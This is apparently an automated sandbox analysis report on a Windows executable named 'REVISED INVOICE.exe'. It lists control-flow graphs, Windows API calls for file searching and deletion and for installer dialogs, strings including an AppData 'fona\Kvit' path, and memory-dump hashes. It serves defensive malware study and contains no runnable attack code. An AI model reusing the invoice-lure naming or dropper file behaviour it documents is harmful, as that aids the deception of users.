                                                                                                control_flow_graph 501 406041-40604c 502 40604e-40605d 501->502 503 40605f-406075 501->503 502->503 504 40607b-406088 503->504 505 40628d-406293 503->505 504->505 506 40608e-406095 504->506 507 406299-4062a4 505->507 508 40609a-4060a7 505->508 506->505 510 4062a6-4062aa call 40601f 507->510 511 4062af-4062b0 507->511 508->507 509 4060ad-4060b9 508->509 512 40627a 509->512 513 4060bf-4060fb 509->513 510->511 515 406288-40628b 512->515 516 40627c-406286 512->516 517 406101-40610c GetVersion 513->517 518 40621b-40621f 513->518 515->505 516->505 519 406126 517->519 520 40610e-406112 517->520 521 406221-406225 518->521 522 406254-406258 518->522 523 40612d-406134 519->523 520->519 526 406114-406118 520->526 527 406235-406242 call 40601f 521->527 528 406227-406233 call 405f66 521->528 524 406267-406278 lstrlenW 522->524 525 40625a-406262 call 406041 522->525 530 406136-406138 523->530 531 406139-40613b 523->531 524->505 525->524 526->519 533 40611a-40611e 526->533 535 406247-406250 527->535 528->535 530->531 536 406177-40617a 531->536 537 40613d-40615a call 405eec 531->537 533->519 538 406120-406124 533->538 535->524 540 406252 535->540 542 40618a-40618d 536->542 543 40617c-406188 GetSystemDirectoryW 536->543 545 40615f-406163 537->545 538->523 544 406213-406219 call 4062b3 540->544 547 4061f8-4061fa 542->547 548 40618f-40619d GetWindowsDirectoryW 542->548 546 4061fc-406200 543->546 544->524 550 406202-406206 545->550 551 406169-406172 call 406041 545->551 546->544 546->550 547->546 549 40619f-4061a9 547->549 548->547 556 4061c3-4061d9 SHGetSpecialFolderLocation 549->556 557 4061ab-4061ae 549->557 550->544 553 406208-40620e lstrcatW 550->553 551->546 553->544 559 4061f4 556->559 560 4061db-4061f2 SHGetPathFromIDListW CoTaskMemFree 556->560 557->556 558 4061b0-4061c1 SHGetFolderPathW 557->558 558->546 558->556 559->547 560->546 560->559
                                                                                                APIs
                                                                                                • GetVersion.KERNEL32(00000000,004216E8,?,004051B5,004216E8,00000000,00000000,0040FEC0), ref: 00406104
                                                                                                • GetSystemDirectoryW.KERNEL32(antireform,00000400), ref: 00406182
                                                                                                • GetWindowsDirectoryW.KERNEL32(antireform,00000400), ref: 00406195
                                                                                                • SHGetFolderPathW.SHELL32(?,00000000,00000000,antireform), ref: 004061BD
                                                                                                • SHGetSpecialFolderLocation.SHELL32(?,?), ref: 004061D1
                                                                                                • SHGetPathFromIDListW.SHELL32(?,antireform), ref: 004061DF
                                                                                                • CoTaskMemFree.OLE32(?), ref: 004061EA
                                                                                                • lstrcatW.KERNEL32(antireform,\Microsoft\Internet Explorer\Quick Launch), ref: 0040620E
                                                                                                • lstrlenW.KERNEL32(antireform,00000000,004216E8,?,004051B5,004216E8,00000000,00000000,0040FEC0), ref: 00406268
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.378257129.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.378189875.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.378263490.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.378271848.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.378271848.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.378271848.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.378271848.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.378271848.0000000000462000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.378511911.0000000000466000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_REVISED INVOICE.jbxd
                                                                                                Similarity
                                                                                                • API ID: DirectoryFolderPath$FreeFromListLocationSpecialSystemTaskVersionWindowslstrcatlstrlen
                                                                                                • String ID: Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch$antireform
                                                                                                • API String ID: 3575957451-816509579
                                                                                                • Opcode ID: 2cf121e3e7616b5f5fc1bd3774cadb37834e6b4aa39da4076735cc4ba433a86e
                                                                                                • Instruction ID: fd30239bcabdd6b9b5dacf38e9278243e7343c89492a0aeb8152419411716c6f
                                                                                                • Opcode Fuzzy Hash: 2cf121e3e7616b5f5fc1bd3774cadb37834e6b4aa39da4076735cc4ba433a86e
                                                                                                • Instruction Fuzzy Hash: 70614771A00101ABDF209F64CC40AAE37A5AF51314F12817FE916BA2D1D73D89A2CB5E

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 562 405810-405836 call 405adb 565 405838-40584a DeleteFileW 562->565 566 40584f-405856 562->566 567 4059cc-4059d0 565->567 568 405858-40585a 566->568 569 405869-405879 call 40601f 566->569 570 405860-405863 568->570 571 40597a-40597f 568->571 575 405888-405889 call 405a1f 569->575 576 40587b-405886 lstrcatW 569->576 570->569 570->571 571->567 574 405981-405984 571->574 577 405986-40598c 574->577 578 40598e-405996 call 406362 574->578 580 40588e-405892 575->580 576->580 577->567 578->567 586 405998-4059ac call 4059d3 call 4057c8 578->586 583 405894-40589c 580->583 584 40589e-4058a4 lstrcatW 580->584 583->584 585 4058a9-4058c5 lstrlenW FindFirstFileW 583->585 584->585 587 4058cb-4058d3 585->587 588 40596f-405973 585->588 602 4059c4-4059c7 call 40517e 586->602 603 4059ae-4059b1 586->603 590 4058f3-405907 call 40601f 587->590 591 4058d5-4058dd 587->591 588->571 593 405975 588->593 604 405909-405911 590->604 605 40591e-405929 call 4057c8 590->605 594 405952-405962 FindNextFileW 591->594 595 4058df-4058e7 591->595 593->571 594->587 601 405968-405969 FindClose 594->601 595->590 598 4058e9-4058f1 595->598 598->590 598->594 601->588 602->567 603->577 606 4059b3-4059c2 call 40517e call 405ec0 603->606 604->594 607 405913-40591c call 405810 604->607 615 40594a-40594d call 40517e 605->615 616 40592b-40592e 605->616 606->567 607->594 615->594 617 405930-405940 call 40517e call 405ec0 616->617 618 405942-405948 616->618 617->594 618->594
                                                                                                APIs
                                                                                                • DeleteFileW.KERNEL32(?,?,7570D4C4,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\REVISED INVOICE.exe"), ref: 00405839
                                                                                                • lstrcatW.KERNEL32(00424710,\*.*,00424710,?,?,7570D4C4,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\REVISED INVOICE.exe"), ref: 00405881
                                                                                                • lstrcatW.KERNEL32(?,00409014,?,00424710,?,?,7570D4C4,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\REVISED INVOICE.exe"), ref: 004058A4
                                                                                                • lstrlenW.KERNEL32(?,?,00409014,?,00424710,?,?,7570D4C4,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\REVISED INVOICE.exe"), ref: 004058AA
                                                                                                • FindFirstFileW.KERNELBASE(00424710,?,?,?,00409014,?,00424710,?,?,7570D4C4,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\REVISED INVOICE.exe"), ref: 004058BA
                                                                                                • FindNextFileW.KERNEL32(00000000,00000010,000000F2,?,?,?,00409300,0000002E), ref: 0040595A
                                                                                                • FindClose.KERNEL32(00000000), ref: 00405969
                                                                                                Strings
                                                                                                • C:\Users\user\AppData\Local\Temp\, xrefs: 0040581D
                                                                                                • "C:\Users\user\Desktop\REVISED INVOICE.exe", xrefs: 00405819
                                                                                                • \*.*, xrefs: 0040587B
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.378257129.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.378189875.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.378263490.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.378271848.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.378271848.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.378271848.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.378271848.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.378271848.0000000000462000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.378511911.0000000000466000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_REVISED INVOICE.jbxd
                                                                                                Similarity
                                                                                                • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                                                                • String ID: "C:\Users\user\Desktop\REVISED INVOICE.exe"$C:\Users\user\AppData\Local\Temp\$\*.*
                                                                                                • API String ID: 2035342205-1577576717
                                                                                                • Opcode ID: 444c957dec2a676252e87809a4c54072b8c76e9a6927f2055d166312a46e5fa8
                                                                                                • Instruction ID: d8405d9d0b65c0b5bb91e26b2d86fa163654aae1973f92c1c3fedea70a861e09
                                                                                                • Opcode Fuzzy Hash: 444c957dec2a676252e87809a4c54072b8c76e9a6927f2055d166312a46e5fa8
                                                                                                • Instruction Fuzzy Hash: EA41F271800A18FACB21BB658C49BBF7A78EB81365F10817BF805711D1C77C4D919EAE
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.378257129.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.378189875.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.378263490.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.378271848.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.378271848.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.378271848.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.378271848.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.378271848.0000000000462000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.378511911.0000000000466000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_REVISED INVOICE.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 4d5afdfc0dd836d6b0ea96e9b1d1cc0e1a6a0a23e9a334f3c2dfe03cdace4acf
                                                                                                • Instruction ID: 25739d06ab219284b51534763859987154442e2999ed31f69dfe775b8bf1d6bb
                                                                                                • Opcode Fuzzy Hash: 4d5afdfc0dd836d6b0ea96e9b1d1cc0e1a6a0a23e9a334f3c2dfe03cdace4acf
                                                                                                • Instruction Fuzzy Hash: 09F17671D00229CBCF28CFA8C8946ADBBB1FF44305F25856ED856BB281D7785A96CF44
                                                                                                APIs
                                                                                                • FindFirstFileW.KERNELBASE(7570D4C4,00425758,00424F10,00405B24,00424F10,00424F10,00000000,00424F10,00424F10,7570D4C4,?,C:\Users\user\AppData\Local\Temp\,00405830,?,7570D4C4,C:\Users\user\AppData\Local\Temp\), ref: 0040636D
                                                                                                • FindClose.KERNEL32(00000000), ref: 00406379
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.378257129.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.378189875.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.378263490.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.378271848.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.378271848.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.378271848.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.378271848.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.378271848.0000000000462000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.378511911.0000000000466000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_REVISED INVOICE.jbxd
                                                                                                Similarity
                                                                                                • API ID: Find$CloseFileFirst
                                                                                                • String ID: XWB
                                                                                                • API String ID: 2295610775-4039527733
                                                                                                • Opcode ID: 0fc78072580e2aa021d4eb5561dc00c277e918fd128e5e9fad30f275acd9c25d
                                                                                                • Instruction ID: b60ab41fd2821b41d0b392bba1ac2053f61c2dcbfada57179e30504603363e2d
                                                                                                • Opcode Fuzzy Hash: 0fc78072580e2aa021d4eb5561dc00c277e918fd128e5e9fad30f275acd9c25d
                                                                                                • Instruction Fuzzy Hash: BBD0123194C1209FD3401778BD0C88B7B989B553317214B72FD2AF23E0C3388C6586D9
                                                                                                APIs
                                                                                                • CoCreateInstance.OLE32(0040749C,?,00000001,0040748C,?), ref: 00402114
                                                                                                Strings
                                                                                                • C:\Users\user\AppData\Local\fona\Kvit, xrefs: 00402154
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.378257129.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.378189875.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.378263490.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.378271848.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.378271848.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.378271848.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.378271848.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.378271848.0000000000462000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.378511911.0000000000466000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_REVISED INVOICE.jbxd
                                                                                                Similarity
                                                                                                • API ID: CreateInstance
                                                                                                • String ID: C:\Users\user\AppData\Local\fona\Kvit
                                                                                                • API String ID: 542301482-989027284
                                                                                                • Opcode ID: 320fb439ea4e888771484c94230a40a89910293f2e172b1d57c34123c0f06ddb
                                                                                                • Instruction ID: 6cbe38940624da38e40774ab578681f1f604b85ca8fb8198b005fe2b44c0e728
                                                                                                • Opcode Fuzzy Hash: 320fb439ea4e888771484c94230a40a89910293f2e172b1d57c34123c0f06ddb
                                                                                                • Instruction Fuzzy Hash: A7411D75A00208AFCF00DFA4CD889AD7BB5FF48314B20457AF515EB2D1D7799A41CB55
                                                                                                APIs
                                                                                                • FindFirstFileW.KERNELBASE(00000000,?,00000002), ref: 0040280A
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.378257129.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.378189875.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.378263490.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.378271848.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.378271848.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.378271848.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.378271848.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.378271848.0000000000462000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.378511911.0000000000466000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_REVISED INVOICE.jbxd
                                                                                                Similarity
                                                                                                • API ID: FileFindFirst
                                                                                                • String ID:
                                                                                                • API String ID: 1974802433-0
                                                                                                • Opcode ID: f38b5e3cf6ff4c4fc5999f7d2d4492e5b1947f8a2322db42d1fcf1e91754c34c
                                                                                                • Instruction ID: 5886dfe4bc611d4993f15ed40ae28ce81127269af5662ddb55851ccd49cbf6f1
                                                                                                • Opcode Fuzzy Hash: f38b5e3cf6ff4c4fc5999f7d2d4492e5b1947f8a2322db42d1fcf1e91754c34c
                                                                                                • Instruction Fuzzy Hash: 10F05E71A00115ABC711EFA4DD49AAEB378FF04324F1005BBF105E21E1D6B89A409B29

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 257 403c0b-403c1d 258 403c23-403c29 257->258 259 403d5e-403d6d 257->259 258->259 260 403c2f-403c38 258->260 261 403dbc-403dd1 259->261 262 403d6f-403db7 GetDlgItem * 2 call 4040e3 SetClassLongW call 40140b 259->262 263 403c3a-403c47 SetWindowPos 260->263 264 403c4d-403c50 260->264 266 403e11-403e16 call 40412f 261->266 267 403dd3-403dd6 261->267 262->261 263->264 269 403c52-403c64 ShowWindow 264->269 270 403c6a-403c70 264->270 275 403e1b-403e36 266->275 272 403dd8-403de3 call 401389 267->272 273 403e09-403e0b 267->273 269->270 276 403c72-403c87 DestroyWindow 270->276 277 403c8c-403c8f 270->277 272->273 288 403de5-403e04 SendMessageW 272->288 273->266 274 4040b0 273->274 283 4040b2-4040b9 274->283 281 403e38-403e3a call 40140b 275->281 282 403e3f-403e45 275->282 284 40408d-404093 276->284 286 403c91-403c9d SetWindowLongW 277->286 287 403ca2-403ca8 277->287 281->282 291 403e4b-403e56 282->291 292 40406e-404087 DestroyWindow EndDialog 282->292 284->274 289 404095-40409b 284->289 286->283 293 403d4b-403d59 call 40414a 287->293 294 403cae-403cbf GetDlgItem 287->294 288->283 289->274 296 40409d-4040a6 ShowWindow 289->296 291->292 297 403e5c-403ea9 call 406041 call 4040e3 * 3 GetDlgItem 291->297 292->284 293->283 298 403cc1-403cd8 SendMessageW IsWindowEnabled 294->298 299 403cde-403ce1 294->299 296->274 327 403eb3-403eef ShowWindow KiUserCallbackDispatcher call 404105 EnableWindow 297->327 328 403eab-403eb0 297->328 298->274 298->299 300 403ce3-403ce4 299->300 301 403ce6-403ce9 299->301 304 403d14-403d19 call 4040bc 300->304 305 403cf7-403cfc 301->305 306 403ceb-403cf1 301->306 304->293 308 403d32-403d45 SendMessageW 305->308 310 403cfe-403d04 305->310 306->308 309 403cf3-403cf5 306->309 308->293 309->304 313 403d06-403d0c call 40140b 310->313 314 403d1b-403d24 call 40140b 310->314 325 403d12 313->325 314->293 323 403d26-403d30 314->323 323->325 325->304 331 403ef1-403ef2 327->331 332 403ef4 327->332 328->327 333 403ef6-403f24 GetSystemMenu EnableMenuItem SendMessageW 331->333 332->333 334 403f26-403f37 SendMessageW 333->334 335 403f39 333->335 336 403f3f-403f7d call 404118 call 40601f lstrlenW call 406041 SetWindowTextW call 401389 334->336 335->336 336->275 345 403f83-403f85 336->345 345->275 346 403f8b-403f8f 345->346 347 403f91-403f97 346->347 348 403fae-403fc2 DestroyWindow 346->348 347->274 349 403f9d-403fa3 347->349 348->284 350 403fc8-403ff5 CreateDialogParamW 348->350 349->275 351 403fa9 349->351 350->284 352 403ffb-404052 call 4040e3 GetDlgItem GetWindowRect ScreenToClient SetWindowPos call 401389 350->352 351->274 352->274 357 404054-40406c ShowWindow call 40412f 352->357 357->284
                                                                                                APIs
                                                                                                • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403C47
                                                                                                • ShowWindow.USER32(?), ref: 00403C64
                                                                                                • DestroyWindow.USER32 ref: 00403C78
                                                                                                • SetWindowLongW.USER32(?,00000000,00000000), ref: 00403C94
                                                                                                • GetDlgItem.USER32(?,?), ref: 00403CB5
                                                                                                • SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00403CC9
                                                                                                • IsWindowEnabled.USER32(00000000), ref: 00403CD0
                                                                                                • GetDlgItem.USER32(?,00000001), ref: 00403D7E
                                                                                                • GetDlgItem.USER32(?,00000002), ref: 00403D88
                                                                                                • SetClassLongW.USER32(?,000000F2,?), ref: 00403DA2
                                                                                                • SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 00403DF3
                                                                                                • GetDlgItem.USER32(?,00000003), ref: 00403E99
                                                                                                • ShowWindow.USER32(00000000,?), ref: 00403EBA
                                                                                                • KiUserCallbackDispatcher.NTDLL(?,?), ref: 00403ECC
                                                                                                • EnableWindow.USER32(?,?), ref: 00403EE7
                                                                                                • GetSystemMenu.USER32 ref: 00403EFD
                                                                                                • EnableMenuItem.USER32 ref: 00403F04
                                                                                                • SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 00403F1C
                                                                                                • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 00403F2F
                                                                                                • lstrlenW.KERNEL32(00422708,?,00422708,00428220), ref: 00403F58
                                                                                                • SetWindowTextW.USER32(?,00422708,00000000,00422708,?,00422708,00428220), ref: 00403F6C
                                                                                                • ShowWindow.USER32(?,0000000A), ref: 004040A0
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.378257129.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.378189875.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.378263490.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.378271848.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.378271848.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.378271848.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.378271848.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.378271848.0000000000462000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.378511911.0000000000466000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_REVISED INVOICE.jbxd
                                                                                                Similarity
                                                                                                • API ID: Window$Item$MessageSend$Show$EnableLongMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
                                                                                                • String ID:
                                                                                                • API String ID: 3282139019-0
                                                                                                • Opcode ID: 18a99261430c4225635231928db8a64f2f43d3b33d48ccba4c43f88b8e0e4f23
                                                                                                • Instruction ID: 61cac7681639d4f9e887145b94be1570fe16d39d0a036e069046cfcd2a92ab20
                                                                                                • Opcode Fuzzy Hash: 18a99261430c4225635231928db8a64f2f43d3b33d48ccba4c43f88b8e0e4f23
                                                                                                • Instruction Fuzzy Hash: 3BC1C071A04200BBDB316F61ED84E2B3AACEB95705F50053EF601B11F1CB799992DB6E

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 360 403868-403880 call 4063f5 363 403882-403892 call 405f66 360->363 364 403894-4038cb call 405eec 360->364 373 4038ee-403917 call 403b3e call 405adb 363->373 369 4038e3-4038e9 lstrcatW 364->369 370 4038cd-4038de call 405eec 364->370 369->373 370->369 378 4039a9-4039b1 call 405adb 373->378 379 40391d-403922 373->379 385 4039b3-4039ba call 406041 378->385 386 4039bf-4039e4 LoadImageW 378->386 379->378 380 403928-403942 call 405eec 379->380 384 403947-403950 380->384 384->378 387 403952-403956 384->387 385->386 389 403a65-403a6d call 40140b 386->389 390 4039e6-403a16 RegisterClassW 386->390 391 403968-403974 lstrlenW 387->391 392 403958-403965 call 405a00 387->392 401 403a77-403a82 call 403b3e 389->401 402 403a6f-403a72 389->402 393 403b34 390->393 394 403a1c-403a60 SystemParametersInfoW CreateWindowExW 390->394 399 403976-403984 lstrcmpiW 391->399 400 40399c-4039a4 call 4059d3 call 40601f 391->400 392->391 398 403b36-403b3d 393->398 394->389 399->400 405 403986-403990 GetFileAttributesW 399->405 400->378 413 403a88-403aa2 ShowWindow call 406389 401->413 414 403b0b-403b13 call 405251 401->414 402->398 408 403992-403994 405->408 409 403996-403997 call 405a1f 405->409 408->400 408->409 409->400 421 403aa4-403aa9 call 406389 413->421 422 403aae-403ac0 GetClassInfoW 413->422 419 403b15-403b1b 414->419 420 403b2d-403b2f call 40140b 414->420 419->402 423 403b21-403b28 call 40140b 419->423 420->393 421->422 426 403ac2-403ad2 GetClassInfoW RegisterClassW 422->426 427 403ad8-403afb DialogBoxParamW call 40140b 422->427 423->402 426->427 431 403b00-403b09 call 4037b8 427->431 431->398
                                                                                                APIs
                                                                                                  • Part of subcall function 004063F5: GetModuleHandleA.KERNEL32(?,?,00000020,004032D6,00000009,SETUPAPI,USERENV,UXTHEME), ref: 00406407
                                                                                                  • Part of subcall function 004063F5: GetProcAddress.KERNEL32(00000000,?,?,00000020,004032D6,00000009,SETUPAPI,USERENV,UXTHEME), ref: 00406422
                                                                                                • lstrcatW.KERNEL32(1033,00422708,80000001,Control Panel\Desktop\ResourceLocale,00000000,00422708,00000000,00000002,7570D4C4,C:\Users\user\AppData\Local\Temp\,00000000,"C:\Users\user\Desktop\REVISED INVOICE.exe"), ref: 004038E9
                                                                                                • lstrlenW.KERNEL32(antireform,?,?,?,antireform,00000000,C:\Users\user\AppData\Local\fona\Kvit,1033,00422708,80000001,Control Panel\Desktop\ResourceLocale,00000000,00422708,00000000,00000002,7570D4C4), ref: 00403969
                                                                                                • lstrcmpiW.KERNEL32(?,.exe,antireform,?,?,?,antireform,00000000,C:\Users\user\AppData\Local\fona\Kvit,1033,00422708,80000001,Control Panel\Desktop\ResourceLocale,00000000,00422708,00000000), ref: 0040397C
                                                                                                • GetFileAttributesW.KERNEL32(antireform), ref: 00403987
                                                                                                • LoadImageW.USER32 ref: 004039D0
                                                                                                  • Part of subcall function 00405F66: wsprintfW.USER32 ref: 00405F73
                                                                                                • RegisterClassW.USER32(004281C0), ref: 00403A0D
                                                                                                • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00403A25
                                                                                                • CreateWindowExW.USER32 ref: 00403A5A
                                                                                                • ShowWindow.USER32(00000005,00000000), ref: 00403A90
                                                                                                • GetClassInfoW.USER32(00000000,RichEdit20W,004281C0), ref: 00403ABC
                                                                                                • GetClassInfoW.USER32(00000000,RichEdit,004281C0), ref: 00403AC9
                                                                                                • RegisterClassW.USER32(004281C0), ref: 00403AD2
                                                                                                • DialogBoxParamW.USER32 ref: 00403AF1
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.378257129.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.378189875.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.378263490.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.378271848.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.378271848.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.378271848.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.378271848.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.378271848.0000000000462000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.378511911.0000000000466000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_REVISED INVOICE.jbxd
                                                                                                Similarity
                                                                                                • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                                                                                                • String ID: "C:\Users\user\Desktop\REVISED INVOICE.exe"$.DEFAULT\Control Panel\International$.exe$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\fona\Kvit$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb$antireform
                                                                                                • API String ID: 1975747703-182827311
                                                                                                • Opcode ID: db80b2588597b3e26acc2e4c4de499a3f9846f615b8d16b47e4426e139c46013
                                                                                                • Instruction ID: 2be98759588b12f3ea5babf1b6ec1a1322f2c31473ef1d4f92accd895ea03b39
